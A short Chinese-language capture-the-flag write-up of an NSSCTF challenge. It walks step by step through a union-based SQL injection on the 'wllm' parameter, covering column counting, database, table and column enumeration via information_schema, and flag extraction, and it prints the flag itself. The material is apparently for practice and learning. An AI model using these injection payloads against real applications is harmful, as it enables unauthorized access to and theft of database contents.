打开发现一个杰哥图片打开源代码查看发现参数是wllm
然后试着注入一个参数wllm=1
回显了ok找注入点,?wllm=1'order by 3 --+ ok 发现字段数为三联合注入试试。
?wllm=-1'union select 1,2,3 --+ 发现回显位在2,3
找到回显位之后爆库, 找到库名test_db
?wllm=-1 'union select 1,2,database() --+
然后再报表找到两个表名。
?wllm=-1 'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='test_db' --+
然后看看test.tb有哪些列,发现了flag和id
?wllm=-1 'union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='test_tb' --+
ok打开flag
?wllm=-1 'union select 1,2,flag from test_tb --+
NSSCTF{8c6a2acf-3018-46a5-a18e-85cbdc493c2a}